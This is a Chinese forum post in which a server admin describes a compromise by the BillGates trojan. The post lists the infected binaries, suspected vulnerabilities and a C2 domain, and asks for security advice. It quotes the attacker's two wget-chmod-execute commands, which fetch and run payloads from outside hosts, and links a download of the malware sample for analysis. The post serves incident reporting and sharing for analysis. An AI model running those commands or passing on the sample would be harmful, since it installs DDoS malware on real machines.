人生第一次遇到服务器被入侵了，放了一个 DDOS 脚本进去，附病毒样本。

今天下午收到腾讯云安全通知，通知服务器被入侵了，然后去腾讯云看了一下，的确被日了。

系统的 5 个文件全被一个名叫：Elf32.Trojan.BillGates.da的病毒感染了，分别是：

/usr/bin/ps
/usr/bin/lsof
/usr/bin/netstat
/usr/bin/bsd-port/getty
/usr/bin/.sshd

接着发现在 root 目录被下载了 3 个文件：20000 、conf.n 、Kabot，查了一下执行命令：

/bin/sh -c id;wget http://2w.kacdn.cn/20000;chmod 777 20000;./20000
/bin/sh -c id;wget http://117.24.13.169:881/KaBot;chmod 777 KaBot;./KaBot

接着发现，这个木马向 www.id666.pw 这个地址发送请求，请求了 14 次。

想了一下是什么原因被入侵的，服务器没有发现被暴力破解，那屌毛也没有登陆服务器，提权也没发现，因为安全组入站只开放了 3000 这一个端口，出站没有限制任何流量。服务器上运行了 YApi 的程序，就是这个程序使用的 3000 端口，几乎可以排除是从 YApi Web 入侵的，因为 Web 只允许指定地区访问并且就只有两个城市加入了白名单，平时也是公司的人用，没有对外开放过。

截至被入侵前，服务器还有两个漏洞没处理，分别是：

• OpenSSH XMSS Key 解析整数溢出漏洞
• OpenSSL 拒绝服务漏洞(CVE-2021-3449)

所以也不能排除可能是因为这两个漏洞被日的，我把被感染的程序、病毒样本和木马文件打包了一下，有能力的大佬可以分析一下。

下载地址： https://ws28.cn/f/5tdnbv41qsg （只有 24 小时有效期）

因为服务器只有 YApi 一个程序和一个数据库，数据库有备份，YApi 可以重新下载。所以收到报警就直接重装了，不给这屌毛一丁点机会。

最后想问下大家平时都是怎么做安全的？这玩意防不胜防啊我丢！